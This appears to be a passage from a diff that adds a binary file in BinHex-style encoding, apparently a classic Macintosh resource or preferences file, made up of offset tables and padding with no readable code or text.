+*6%8"!!%[4NP-43%!!CP'58a&!3!"-%G599!!!!!!!!!!!!9`Df0c0`!!!!C'58a
+&!3!"-NC*6%8"!!%c4NP-43%!!6&'58a&!3!"R%C*6%8"!!'D4NP-43%!!CY(8P9
+3!!!!!!!!!!!%FQ&ZC!!!!!4'58a&!3!"0%C*6%8"!!%e4NP-43%!!6C'58a&!3!
+"TdG599!!!!!!!!!!!!0bBc)!!!!&4NP-43%!!6T'58a&!3!"1dC*6%8"!!%j4NP
+-43%!!6G'58a&!3!"1%G599!!!!!!!!!!!!0bBc3!!!!#4NP-43%!!6e'58a&!3!
+"2%G599!!!!!!!!!!!!0bBc8!!!!&4NP-43%!!8*'58a&!3!"3%C*6%8"!!&"4NP
+-43%!!6j'58a&!3!"2dG599!!!!!!!!!!!!CbDA"PE@3!!!!#4NP-43%!!80'58a
+&!3!"4%G599!!!!!!!!!!!!0bFf%!!!!-4NP-43%!!89'58a&!3!"4dC*6%8"!!&
+)4NP-43%!!8e'58a&!3!"6%C*6%8"!!&'4NP-43%!!8Y'58a&!3!"6NC*6%8"!!&
+*4NP-43%!!8T'58a&!3!"R8C*6%8"!!'H4e*98!!!!!!!!!!!!h0SB3!!!!4'58a
+&!3!"88C*6%8"!!&24NP-43%!!9*'58a&!3!"8%G599!!!!!!!!!!!!9cG'&MD`!
+!!!&'58a&!3!"8dG599!!!!!!!!!!!!CdH(4IC')!!!!"4NP-43%!!94(8P93!!!
+!!!!!!!!%H$8`13!!!"9'58a&!3!"A%C*6%8"!!&E4NP-43%!!@&'58a&!3!"@NC
+*6%8"!!&J4NP-43%!!@*'58a&!3!"JdC*6%8"!!&Q4NP-43%!!@0'58a&!3!"@%C
+*6%8"!!&G4NP-43%!!9G'58a&!3!"C8C*6%8"!!&H4NP-43%!!9P'58a&!3!"AdC
+*6%8"!!&R4NP-43%!!@4'58a&!3!"K%C*6%8"!!&94NP-43%!!9C(8P93!!!!!!!
+!!!!'H$8`1ABc!!!!&8C*6%8"!!&V4NP-43%!!@a'58a&!3!"E8C*6%8"!!&a4NP
+-43%!!A0'58a&!3!"G8C*6%8"!!&h4NP-43%!!AT'58a&!3!"D%C*6%8"!!&b4NP
+-43%!!@T'58a&!3!"H%C*6%8"!!&T4NP-43%!!AC'58a&!3!"G%C*6%8"!!&`4NP
+-43%!!AP'58a&!3!"ENC*6%8"!!&[4NP-43%!!B9'58a&!3!"KNG599!!!!!!!!!
+!!!0cFf`!!!!M4NP-43%!!"0'58a&!3!!&8C*6%8"!!!34NP-43%!!"*'58a&!3!
+!%8C*6%8"!!!84NP-43%!!"T'58a&!3!!(%C*6%8"!!!A4NP-43%!!"P'58a&!3!
+!'%C*6%8"!!!E4NP-43%!!"C'58a&!3!!$8C*6%8"!!!24NP-43%!!!Y'58a&!3!
+!$%C*6%8"!!!14NP-43%!!#Y'58a&!3!!,%C*6%8"!!!S4NP-43%!!#T'58a&!3!
+!+8C*6%8"!!!M4NP-43%!!#*'58a&!3!!(dC*6%8"!!!P4NP-43%!!#"'58a&!3!
+!*NC*6%8"!!!N4NP-43%!!"j'58a&!3!!*dC*6%8"!!!G4NP-43%!!!T'58a&!3!
+!)8G599!!!!!!!!!!!!j(990*)%aTBR*KFQPPF`!!!!0'58a&!J!!,dG599!!!!!
+!!!!!!!038%-!!!!$4NP-43)!!$"'58a&!J!!-8C*6%8#!!!b4e*98!!!!!!!!!!
+!!cBiD`!!!!0'58a&"3!!&%C*6%8&!!!94NP-438!!"C(8P93!!!!!!!!!!!138j
+655"-D@*bBA*TCA-!!!!#4e*98!!!!!!!!!!!!e"33`!!!!*'58a&!3!!!8C*6%8
+"!!&r4e*98!!!!!!!!!!!!cBiD`!!!!*'58a&!`!"S%C*6%8$!!'K4e*98!!!!!!
+!!!!!$8eKBb"-D@*bBA*TCA-!!!!#4e*98!!!!!!!!!!!!e"33`!!!!P'58a&!3!
+!"%C*6%8"!!!#4NP-43%!!!0'58a&!3!!#8C*6%8"!!!)4NP-43%!!!G'58a&!3!
+!"NC*6%8"!!!&4NP-43%!!D9(8P93!!!!!!!!!!!$0MKV!!!!"NC*6%8$!!'D4NP
+-43-!!D*'58a&!`!"R%C*6%8$!!'G4NP-43-!!Cp'58a&!`!"Q`!!!"J!!!)!!!)
+!!!!!!J%!"3!!!!!#!J!-!!!!!!)$!!S!!!!!!J3!!J!!!!!#"3!&!!!!!!)'!!)
+!!!!!!JF!"J!!!!!##!!0!!!!!!)*!!8!!!!!!JS!"3!!!!!##`!"!!!!!!)-!!%
+!!!!!!Jd!"`!!!!!#$J!)!!!!!!)2!!8!!!!!!K!!!J!!!!!#%3!#!!!!!!)5!!J
+!!!!!!K-!!3!!!!!#&!!"!!!!!!)9!!J!!!!!!KB!#3!!!!!#&`!%!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!#"J%#!!!c"`%#!!!d!!!!!J3""3!!)!J""3!
+!(`!!!HJ!!!)!!!!6k3!!&!!!!!(S!&j1G!!-6PB!!#m+,`-NEJ!35Ui!!!$*!!!
+!i!!!&0i!!"J!!!!!b3!-,bi!##"U!-JJD!"i6T!!-"mf!!!!!K%!!!)5!!!#%`!
+!!K3!!!)9!!!"p3!!!HJ!!!(H!!!"d3!!!IX!!!(3!!!"p!!!!I`!!!)"!!!"U3!
+!!DS!!!'V!!!!,!!!!#d!!!!Z!!!!,`!!!$!!!!!a!!!!-J!!!$-!!!!d!!!!03!
+!!$B!!!!h!!!!1!!!!$N!!!!k!!!!1`!!!BF!!!!m!!!!23!!!$i!!!!r!!!!3!!
+!!%%!!!',!!!!3J!!!%-!!!"%!!!!43!!!%B!!!"(!!!"kJ!!!Am!!!"p!!!!IJ!
+!!(m!!!'5!!!"N3!!!)!!!!#"!!!!c!!!!B`!!!$0!!!!JJ!!!)-!!!$1!!!!c`!
+!!!N!!!(a!!!!K3!!!)B!!!#(!!!"T3!!!)J!!!#*!!!!LJ!!!)X!!!#-!!!!M3!
+!!)i!!!#2!!!!N!!!!!#4!!!!NJ!!!*-!!!#8!!!!P3!!!*B!!!#A!!!"N`!!!Bi
+!!!'2!!!"M3!!!C!!!!!!K!!!!*J!!!#C!!!#"!!!!93!!!&9!!!"P!!!!BB!!!)
+(!!!##!!!!D`!!!#N!!!!T3!!!+B!!!#R!!!!U!!!!KB!!!'Y!!!!R`!!!+)!!!#
+M!!!"R`!!!AS!!!'Z!!!"V`!!!AX!!!)!!!!"RJ!!!0!!!!#D!!!!Q`!!!*`!!!#
+G!!!!S!!!!*i!!!#K!!!!5!!!!%N!!!"+!!!!5`!!!%`!!!"0!!!!6J!!!%m!!!)
+&!!!#"J!!!+N!!!'`!!!"X3!!!,d!!!#q!!!![`!!!-!!!!$"!!!!d3!!!E)!!!'
+c!!!!`J!!!--!!!$%!!!!a3!!!-B!!!'"!!!!a`!!!-J!!!#U!!!!U`!!!+`!!!'
+d!!!!dJ!!!+d!!!'9!!!!b3!!!D!!!!'e!!!!bJ!!!-X!!!"3!!!!d`!!!03!!!$
+9!!!!eJ!!!0F!!!$B!!!"I!!!!0N!!!$D!!!!f`!!!0`!!!$G!!!!hJ!!!0m!!!$
+J!!!!i3!!!1)!!!$M!!!!j!!!!18!!!$Q!!!!j`!!!1J!!!$T!!!!kJ!!!1X!!!$
+X!!!!l3!!!1i!!!$[!!!!m!!!!2%!!!$b!!!!m`!!!23!!!$e!!!!pJ!!!2F!!!#
+Z!!!!V`!!!J-!!!(D!!!"l3!!!&%!!!"5!!!!8`!!!H`!!!'f!!!"Y`!!!EJ!!!(
+L!!!"i!!!!D%!!!(E!!!"c3!!!F`!!!(F!!!"cJ!!!Gd!!!(2!!!"#3!!!&3!!!"
+9!!!!9J!!!&F!!!"B!!!!@3!!!&S!!!"E!!!!!3!!!3S!!!%,!!!"$!!!!3d!!!%
+1!!!"$`!!!4!!!!(f!!!"k3!!!HF!!!(Q!!!"i`!!!H8!!!(I!!!"rJ!!!Id!!!(
+5!!!"SJ!!!!)!!!(C!!!"%3!!!4)!!!%6!!!"&!!!!48!!!%@!!!"-`!!!Ad!!!'
+M!!!"p`!!!GJ!!!!!!!!"d`!!!!-!!!(A!!!"IJ!!!IJ!!!(V!!!"q3!!!Hi!!!$
+i!!!!q3!!!2S!!!$l!!!!r!!!!2d!!!$q!!!!r`!!!3!!!!%"!!!"Z3!!!&`!!!"
+G!!!"&`!!!4J!!!%C!!!!X!!!!,%!!!#b!!!"j!!!!H%!!!'k!!!"e!!!!!3!!!!
+&!!!"e3!!!GB!!!!'!!!!"`!!!4S!!!%K!!!")J!!!5-!!!%N!!!"*3!!!5B!!!%
+R!!!"+!!!!5N!!!%U!!!"+`!!!5`!!!'B!!!",3!!!5i!!!'@!!!"P`!!!&i!!!"
+I!!!!B!!!!'%!!!"L!!!!B`!!!'3!!!"P!!!!CJ!!!'F!!!"S!!!!D3!!!'S!!!#
+c!!!"qJ!!!I-!!!%E!!!"(!!!!4d!!!%H!!!"(`!!!5!!!!%[!!!"Q3!!!6!!!!%
+a!!!"QJ!!!CX!!!'l!!!"[!!!!6)!!!'p!!!"T!!!!JN!!!)+!!!##`!!!J`!!!)
+0!!!#$J!!!I!!!!)2!!!"!J!!!3-!!!%%!!!""3!!!3B!!!%(!!!"#!!!!,3!!!%
+d!!!"T`!!!DB!!!#e!!!"03!!!6B!!!%h!!!"1!!!!6N!!!%k!!!"1`!!!6`!!!%
+p!!!"2J!!!6m!!!&!!!!"33!!!,B!!!#h!!!"[J!!!Hm!!!)3!!!"3J!!!8-!!!#
+i!!!"[`!!!C`!!!&%!!!"43!!!8B!!!&(!!!"5!!!!Cd!!!&*!!!"5J!!!8X!!!&
+-!!!"63!!!!S!!!!,!!!!$!!!!!d!!!!1!!!!$`!!!"!!!!!4!!!!%J!!!"-!!!!
+8!!!!&3!!!"B!!!!A!!!!'!!!!"N!!!!D!!!!'`!!!F!!!!#j!!!"6J!!!8m!!!&
+3!!!"83!!!F%!!!(r!!!"`J!!!F-!!!!F!!!!(3!!!"i!!!!I!!!!)!!!!#%!!!!
+L!!!!)`!!!#3!!!!P!!!!*J!!!9)!!!#k!!!!Z`!!!F3!!!(&!!!"aJ!!!FF!!!(
+,!!!!*`!!!#J!!!!T!!!!+J!!!#X!!!)#!!!!#!!!!9-!!!'+!!!!D`!!!'`!!!"
+Y!!!"L!!!!'i!!!'*!!!"C`!!!@J!!!&T!!!"DJ!!!@X!!!&X!!!"E3!!!@i!!!&
+[!!!"F!!!!A%!!!&b!!!"K3!!!A-!!!&d!!!"G3!!!AB!!!'%!!!"G`!!!AJ!!!&
+j!!!"b!!!!FN!!!'S!!!"bJ!!!9B!!!&A!!!"JJ!!!9J!!!&C!!!"@J!!!9X!!!&
+F!!!"A3!!!9i!!!&I!!!"B!!!!@%!!!&L!!!"J`!!!@-!!!&N!!!"C3!!!,`!!!(
+b!!!!E`!!!@B!!!"`!!!!F3!!!()!!!"c!!!!G!!!!(8!!!"f!!!!G`!!!(J!!!"
+j!!!!HJ!!!(X!!!"m!!!"J!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!"!!!!-P*26e3!!!!!!!!!!!!!!!!'4e*98!!!!!!!!!!"$P*[H5Gc)%G
+PG%K89&"6!!!!"8C*6%8"!!'L4NP-43%!!D0'58a&!3!"U%C*6%8"!!'K4NP-43%
+!!D"(8P93!!!!!!!!!!)66h"PEP066#""F("XD@0KG'P[EJ!!!#0'58a&!J!!(%C
+*6%8#!!!U4NP-43)!!!e'58a&!J!!)%C*6%8#!!!54NP-43)!!"0'58a&!J!!&NC
+*6%8#!!!B4NP-43)!!"G'58a&!J!!$NC*6%8#!!!H4NP-43)!!"&'58a&!J!!%%C
+*6%8#!!!K4NP-43)!!"4'58a&!J!!&8C*6%8#!!!X4NP-43)!!"T'58a&!J!!'8C
+*6%8#!!!S4NP-43)!!#G'58a&!J!!*%C*6%8#!!!Y4NP-43)!!!Y'58a&!J!!*NC
+*6%8#!!!T4NP-43)!!!a'58a&!J!!+dC*6%8#!!!L4NP-43)!!!p'58a&!J!!'dC
+*6%8#!!!G4NP-43)!!"p'58a&!J!!*8C*6%8#!!!M4e*98!!!!!!!!!!$%8p`C@j
+68d`J6'PLFQ&bD@9c!!!!"%G599!!!!!!!!!!"!038%-!!!!#4NP-43)!!$0'58a
+&!J!!0%G599!!!!!!!!!!"3-f1'X!!!!#4NP-438!!#"'58a&"3!!(dG599!!!!!
+!!!!!"JCMFRP`G'm!!!!S4NP-43%!!Aa'58a&!3!"INC*6%8"!!'N4NP-43%!!Cp
+'58a&!3!"I8C*6%8"!!&l4e*98!!!!!!!!!!("'&cEM%!!!"A4NP-43%!!$j'58a
+&!3!!-8C*6%8"!!"&4NP-43%!!$P'58a&!3!!3dC*6%8"!!!m4NP-43%!!$p'58a
+&!3!!3%C*6%8"!!"%4NP-43%!!%&'58a&!3!!0dC*6%8"!!!e4NP-43%!!$Y'58a
+&!3!!-NC*6%8"!!!i4NP-43%!!%K'58a&!3!!4NC*6%8"!!"#4NP-43%!!$C'58a
+&!3!!4dC*6%8"!!')4NP-43%!!("'58a&!3!!I%C*6%8"!!"i4NP-43%!!(T'58a
+&!3!!H8C*6%8"!!"a4NP-43%!!(C'58a&!3!!FNC*6%8"!!"p4NP-43%!!B&'58a
+&!3!!FdC*6%8"!!"e4NP-43%!!(Y'58a&!3!!A8C*6%8"!!"04NP-43%!!&P'58a
+&!3!!6NC*6%8"!!"D4NP-43%!!%p'58a&!3!!@dC*6%8"!!"34NP-43%!!&a'58a
+&!3!!5dC*6%8"!!"A4NP-43%!!%a'58a&!3!!@%C*6%8"!!"Z4NP-43%!!'p'58a
+&!3!"LNC*6%8"!!"X4NP-43%!!'e'58a&!3!"L8C*6%8"!!',4NP-43%!!'9'58a
+&!3!!D8C*6%8"!!"S4NP-43%!!'G'58a&!3!!BdC*6%8"!!"N4NP-43%!!'&'58a
+&!3!!DNC*6%8"!!"L4NP-43%!!'C'58a&!3!!8dC*6%8"!!"84NP-43%!!&9'58a
+&!3!!9NC*6%8"!!"*4NP-43%!!%T'58a&!3!!ANC*6%8"!!"54NP-43%!!$T'58a
+&!3!!GdC*6%8"!!!c4NP-43%!!(4'58a&!3!!,dC*6%8"!!!Z4NP-43%!!#e'58a
+&!3!!28C*6%8"!!!d4NP-43%!!Ba'58a&!3!!88C*6%8"!!!`4NP-43%!!&p'58a
+&!3!!B%C*6%8"!!"V4e*98!!!!!!!!!!)!Q*Q!!!!"8C*6%8"!!##4NP-43%!!(p
+'58a&!3!!J%C*6%8"!!"q4NP-43%!!)&(8P93!!!!!!!!!!N$BQP[!!!!$NC*6%8
+"!!#%4NP-43%!!Be'58a&!3!!JdC*6%8"!!'14NP-43%!!C&'58a&!3!"MdC*6%8
+"!!'3!%C*6%8"!!#&4NP-43%!!C*'58a&!3!"J%C*6%8"!!'(4NP-43%!!C9'58a
+&!3!"NdC*6%8"!!'84e*98!!!!!!!!!!+!Q*Z!!!!&%C*6%8"!!#'4NP-43%!!)P
+'58a&!3!!LdC*6%8"!!#14NP-43%!!DC'58a&!3!!N8C*6%8"!!#64NP-43%!!*4
+'58a&!3!!PNC*6%8"!!#B4NP-43%!!)K'58a&!3!!M8C*6%8"!!#54NP-43%!!)T
+'58a&!3!!PdC*6%8"!!#(4NP-43%!!*9'58a&!3!!MdC*6%8"!!#3!%C*6%8"!!#
+-4e*98!!!!!!!!!!,"Q*eCQCPFJ!!!!*'58a&!3!!Q8C*6%8"!!#D4e*98!!!!!!
+!!!!-"'0KFh3!!!!&4NP-43%!!*p'58a&!3!!R%C*6%8"!!#G4NP-43%!!*Y'58a
+&!3!!RNG599!!!!!!!!!!$34MEfe`!!!!!dC*6%8"!!#J4NP-43%!!+&'58a&!3!
+!SNG599!!!!!!!!!!$J4MEfjQ!!!!!NC*6%8"!!#M4NP-43%!!+4(8P93!!!!!!!
+!!!m$C'9c!!!!'NC*6%8"!!#P4NP-43%!!+C'58a&!3!!U%C*6%8"!!#T4NP-43%
+!!+Y'58a&!3!!V%C*6%8"!!#Z4NP-43%!!CC'58a&!3!!VdC*6%8"!!#b4NP-43%
+!!,0'58a&!3!!Y%C*6%8"!!#e4NP-43%!!,C'58a&!3!!Z%C*6%8"!!#j4NP-43%
+!!,T'58a&!3!!UNC*6%8"!!#`4NP-43%!!,G'58a&!3!![8C*6%8"!!#l4NP-43%
+!!+G'58a&!3!!X8C*6%8"!!#m4NP-43%!!+e(8P93!!!!!!!!!"!#C'J!!!!&4NP
+-43%!!-"'58a&!3!!`8C*6%8"!!$#4NP-43%!!,j'58a&!3!![dG599!!!!!!!!!
+!%30NFf%!!!!)4NP-43%!!-9'58a&!3!!aNC*6%8"!!$(4NP-43%!!-0'58a&!3!
+!b8C*6%8"!!$)4NP-43%!!-4'58a&!3!"JNG599!!!!!!!!!!%J0PFR)!!!!$4NP
+-43%!!-T'58a&!3!!bdC*6%8"!!$-4e*98!!!!!!!!!!6!f9fF!!!!$p'58a&!3!
+!ddC*6%8"!!$54NP-43%!!04'58a&!3!!eNC*6%8"!!$V4NP-43%!!0e'58a&!3!
+!j%C*6%8"!!$c4NP-43%!!1a'58a&!3!!hNC*6%8"!!$P4NP-43%!!24'58a&!3!
+!k%C*6%8"!!$D4NP-43%!!2G'58a&!3!"!NC*6%8"!!$K4NP-43%!!2"'58a&!3!
+!q%C*6%8"!!$Y4NP-43%!!0p'58a&!3!!jNC*6%8"!!$e4NP-43%!!1P'58a&!3!
+!fdC*6%8"!!$L4NP-43%!!2&'58a&!3!!kNC*6%8"!!$F4NP-43%!!10'58a&!3!
+!mNC*6%8"!!$Z4NP-43%!!1"'58a&!3!!jdC*6%8"!!$f4NP-43%!!2j'58a&!3!
+!qdC*6%8"!!$m4NP-43%!!3"'58a&!3!"!8C*6%8"!!$j4NP-43%!!2T'58a&!3!
+!r8C*6%8"!!$r4NP-43%!!3C'58a&!3!""dC*6%8"!!%)4NP-43%!!3P'58a&!3!
+""8C*6%8"!!%%4NP-43%!!30'58a&!3!!cdC*6%8"!!$04NP-43%!!-j'58a&!3!
+!e8C*6%8"!!$[4NP-43%!!0&'58a&!3!!edC*6%8"!!$34NP-43%!!0P'58a&!3!
+!f%C*6%8"!!'A4NP-43%!!CK(8P93!!!!!!!!!"3%D'eKB`!!!!&'58a&!3!"#NG
+599!!!!!!!!!!&34TC'9K!!!!"8C*6%8"!!%,4NP-43%!!3a'58a&!3!"$NC*6%8
+"!!%04NP-43%!!3p(8P93!!!!!!!!!"B&E'KKFfJ!!!!#4NP-43%!!4"'58a&!3!
+"%8G599!!!!!!!!!!&`0YC$)!!!!#4NP-43%!!4*'58a&!3!"%dG599!!!!!!!!!
+!'!0YC$8!!!!#4NP-43%!!44'58a&!3!"&8G599!!!!!!!!!!'34YC'-b!!!!!NC
+*6%8"!!%@4NP-43%!!4G(8P93!!!!!!!!!"S(Ef*UC@0dF`!!!!4'58a&!3!"'dC
+*6%8"!!%B4NP-43%!!4T'58a&!3!"'8G599!!!!!!!!!!'`0`C@d!!!!'4NP-43%
+!!5&'58a&!3!")%C*6%8"!!%H4NP-43%!!4p'58a&!3!"(%C*6%8"!!%G4e*98!!
+!!!!!!!!F"R"VBh-a-J!!!""'58a&!3!")NC*6%8"!!%M4NP-43%!!54'58a&!3!
+"*8C*6%8"!!%Q4NP-43%!!5G'58a&!3!"+%C*6%8"!!%T4NP-43%!!5T'58a&!3!
+"+dC*6%8"!!%X4NP-43%!!5e'58a&!3!",NC*6%8"!!%[4NP-43%!!CP'58a&!3!
+"-%G599!!!!!!!!!!(39`Df0c0`!!!!C'58a&!3!"-NC*6%8"!!%c4NP-43%!!6&
+'58a&!3!"R%C*6%8"!!'D4NP-43%!!CY(8P93!!!!!!!!!"i%FQ&ZC!!!!!4'58a
+&!3!"0%C*6%8"!!%e4NP-43%!!6C'58a&!3!"TdG599!!!!!!!!!!(`0bBc)!!!!
+&4NP-43%!!6T'58a&!3!"1dC*6%8"!!%j4NP-43%!!6G'58a&!3!"1%G599!!!!!
+!!!!!)!0bBc3!!!!#4NP-43%!!6e'58a&!3!"2%G599!!!!!!!!!!)30bBc8!!!!
+&4NP-43%!!8*'58a&!3!"3%C*6%8"!!&"4NP-43%!!6j'58a&!3!"2dG599!!!!!
+!!!!!)JCbDA"PE@3!!!!#4NP-43%!!80'58a&!3!"4%G599!!!!!!!!!!)`0bFf%
+!!!!-4NP-43%!!89'58a&!3!"4dC*6%8"!!&)4NP-43%!!8e'58a&!3!"6%C*6%8
+"!!&'4NP-43%!!8Y'58a&!3!"6NC*6%8"!!&*4NP-43%!!8T'58a&!3!"R8C*6%8
+"!!'H4e*98!!!!!!!!!!N!h0SB3!!!!4'58a&!3!"88C*6%8"!!&24NP-43%!!9*
+'58a&!3!"8%G599!!!!!!!!!!*39cG'&MD`!!!!&'58a&!3!"8dG599!!!!!!!!!
+!*JCdH(4IC')!!!!"4NP-43%!!94(8P93!!!!!!!!!#F%H$8`13!!!"9'58a&!3!
+"A%C*6%8"!!&E4NP-43%!!@&'58a&!3!"@NC*6%8"!!&J4NP-43%!!@*'58a&!3!
+"JdC*6%8"!!&Q4NP-43%!!@0'58a&!3!"@%C*6%8"!!&G4NP-43%!!9G'58a&!3!
+"C8C*6%8"!!&H4NP-43%!!9P'58a&!3!"AdC*6%8"!!&R4NP-43%!!@4'58a&!3!
+"K%C*6%8"!!&94NP-43%!!9C(8P93!!!!!!!!!#J'H$8`1ABc!!!!&8C*6%8"!!&
+V4NP-43%!!@a'58a&!3!"E8C*6%8"!!&a4NP-43%!!A0'58a&!3!"G8C*6%8"!!&
+h4NP-43%!!AT'58a&!3!"D%C*6%8"!!&b4NP-43%!!@T'58a&!3!"H%C*6%8"!!&
+T4NP-43%!!AC'58a&!3!"G%C*6%8"!!&`4NP-43%!!AP'58a&!3!"ENC*6%8"!!&
+[4NP-43%!!B9'58a&!3!"KNG599!!!!!!!!!!+30cFf`!!!!M4NP-43%!!"0'58a
+&!3!!&8C*6%8"!!!34NP-43%!!"*'58a&!3!!%8C*6%8"!!!84NP-43%!!"T'58a
+&!3!!(%C*6%8"!!!A4NP-43%!!"P'58a&!3!!'%C*6%8"!!!E4NP-43%!!"C'58a
+&!3!!$8C*6%8"!!!24NP-43%!!!Y'58a&!3!!$%C*6%8"!!!14NP-43%!!#Y'58a
+&!3!!,%C*6%8"!!!S4NP-43%!!#T'58a&!3!!+8C*6%8"!!!M4NP-43%!!#*'58a
+&!3!!(dC*6%8"!!!P4NP-43%!!#"'58a&!3!!*NC*6%8"!!!N4NP-43%!!"j'58a
+&!3!!*dC*6%8"!!!G4NP-43%!!!T'58a&!3!!)8G599!!!!!!!!!!+Jj(990*)%a
+TBR*KFQPPF`!!!!0'58a&!J!!,dG599!!!!!!!!!!+`038%-!!!!$4NP-43)!!$"
+'58a&!J!!-8C*6%8#!!!b4e*98!!!!!!!!!!X!cBiD`!!!!0'58a&"3!!&%C*6%8
+&!!!94NP-438!!"C(8P93!!!!!!!!!#d138j655"-D@*bBA*TCA-!!!!#4e*98!!
+!!!!!!!!Z!e"33`!!!!*'58a&!3!!!8C*6%8"!!&r4e*98!!!!!!!!!![!cBiD`!
+!!!*'58a&!`!"S%C*6%8$!!'K4e*98!!!!!!!!!!`$8eKBb"-D@*bBA*TCA-!!!!
+#4e*98!!!!!!!!!!a!e"33`!!!!P'58a&!3!!"%C*6%8"!!!#4NP-43%!!!0'58a
+&!3!!#8C*6%8"!!!)4NP-43%!!!G'58a&!3!!"NC*6%8"!!!&4NP-43%!!D9(8P9
+3!!!!!!!!!$)$0MKV!!!!"NC*6%8$!!'D4NP-43-!!D*'58a&!`!"R%C*6%8$!!'
+G4NP-43-!!Cp'58a&!`!"Q`!!!4#V3!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!"+!!!'!"YFh4b!!!!!!!!!!!!!!!!!!!C+!!!#S"YFh4X!!!!!!!
+!!!!!!!!!!!!MU!!!!i"YFh4Z!!!!!!!!!!!!!!!!!!!R+!!!'!"YFh4b!!!$k!!
+!!!!!!!!!!!!r+!!!'B"YFh4X!!!$k!!!!!!!!!!!!!0TDJ!!#)"YFh4Z!!!$k!!
+!!!!!!!!!!!"E+!!!"4"`FQ9Q!!P'eJ!!!!%!!!!!!!"J1!!!!!K`FQ9Q!!L`,3!
+!!!)!!!!!!!"J3!!!!"T`FQ9Q!!PX2!!!!!-!!!!!!!"J@J!!$+"`FQ9Q!!MrS3!
+!!!3!!!!!!!"XqJ!!"K4`FQ9Q!!L+i3!!!!8!!!!!!!"c$J!!#*C`FQ9Q!!P5m!!
+!!!B!!!!!!!"lT!!!!3G`FQ9Q!!Le63!!!!F!!!!!!!"mU`!!!b"`FQ9Q!!N!,`!
+!!!J!!!!!!!"rb`!!!"4`FQ9Q!!NR4!!!!!N!!!!!!!"rh`!!!!T`FQ9Q!!M`UJ!
+!!!S!!!!!!!"rk3!!!!a`FQ9Q!!L"hJ!!!!X!!!!!!!"rp3!!!!j`FQ9Q!!M0!!!
+!!!`!!!!!!!#!!`!!!3C`FQ9Q!!Kpf3!!!!d!!!!!!!#"#3!!!$j`FQ9Q!!N#K!!
+!!!i!!!!!!!#"4`!!!!j`FQ9Q!!PRC3!!!!m!!!!!!!#"93!!!GT`FQ9Q!!MG@`!
+!!"!!!!!!!!#$,`!!!'*`FQ9Q!!M*!3!!!"%!!!!!!!#$N3!!!"4`FQ9Q!!MP"`!
+!!")!!!!!!!#$T3!!!!T`FQ9Q!!LpV!!!!"-!!!!!!!#$V`!!!!a`FQ9Q!!PJK`!
+!!"3!!!!!!!#$Z`!!!-T`FQ9Q!!L(e!!!!"8!!!!!!!#%K3!!!4K`FQ9Q!!LAh3!
+!!"B!!!!!!!#&R3!!!+K`FQ9Q!!LpP!!!!"F!!!!!!!#'43!!!#j`FQ9Q!!PBJJ!
+!!"J!!!!!!!#'F`!!!Ja`FQ9Q!!N()3!!!"N!!!!!!!#)I`!!4J"YG("X!!!!!3!
+!!!!!!!!!!!$1I`!!"`"YG("c!!!!!3!!!!!!!!!!!!$9I`!!!""YG("T!!!!!3!
+!!!!!!!!!!!$9M`!!"U"YG'a[!!!!!3!!!!!!!!!!!!$F,`!!!#"YG(0X!!!!!3!
+!!!!!!!!!!!$F6`!!"4"`FQ9Q!!NN23!!!"S!!!!!!!$KA`!!!!K`FQ9Q!!M6`J!
+!!"X!!!!!!!$KC`!!!"T`FQ9Q!!KkI3!!!"`!!!!!!!$KJ3!!%0"`FQ9Q!!LKD`!
+!!"d!!!!!!!$b83!!"K4`FQ9Q!!PS2J!!!"i!!!!!!!$iC3!!#*C`FQ9Q!!M14`!
+!!"m!!!!!!!%!q`!!!3G`FQ9Q!!P,IJ!!!#!!!!!!!!%#!J!!!b"`FQ9Q!!Mle3!
+!!#%!!!!!!!%&)J!!!"4`FQ9Q!!NP93!!!#)!!!!!!!%&0J!!!!T`FQ9Q!!LIJJ!
+!!#-!!!!!!!%&3!!!!!a`FQ9Q!!L8Z!!!!#3!!!!!!!%&6!!!!!j`FQ9Q!!P54!!
+!!#8!!!!!!!%&@J!!!3C`FQ9Q!!P'2`!!!#B!!!!!!!%'B!!!!$j`FQ9Q!!N63!!
+!!#F!!!!!!!%'RJ!!!!j`FQ9Q!!MZ(3!!!#J!!!!!!!%'V!!!!GT`FQ9Q!!Lmf!!
+!!#N!!!!!!!%)KJ!!!'*`FQ9Q!!LrK!!!!#S!!!!!!!%)k!!!!"4`FQ9Q!!NchJ!
+!!#X!!!!!!!%)r!!!!!T`FQ9Q!!M,S!!!!#`!!!!!!!%*"J!!!!a`FQ9Q!!N%'3!
+!!#d!!!!!!!%*%J!!!-T`FQ9Q!!NJ2!!!!#i!!!!!!!%*h!!!!4K`FQ9Q!!PIl3!
+!!#m!!!!!!!%+p!!!!+K`FQ9Q!!Lq%J!!!$!!!!!!!!%,R!!!!#j`FQ9Q!!LM0`!
+!!$%!!!!!!!%,bJ!!!Ja`FQ9Q!!NG#`!!!$)!!!!!!!%0eJ!!#J"YG("X!!!!!J!
+!!!!!!!!!!!%AeJ!!!3"YG("c!!!!!J!!!!!!!!!!!!%BeJ!!!""YG("T!!!!!J!
+!!!!!!!!!!!%BjJ!!!0"YG'a[!!!!!J!!!!!!!!!!!!%CYJ!!!#"YG(0X!!!!!J!
+!!!!!!!!!!!%CeJ!!"4"`FQ9Q!!PDj!!!!$-!!!!!!!%HjJ!!!!K`FQ9Q!!NN$!!
+!!$3!!!!!!!%HlJ!!!"T`FQ9Q!!MT*`!!!$8!!!!!!!%I#!!!$+"`FQ9Q!!P`ZJ!
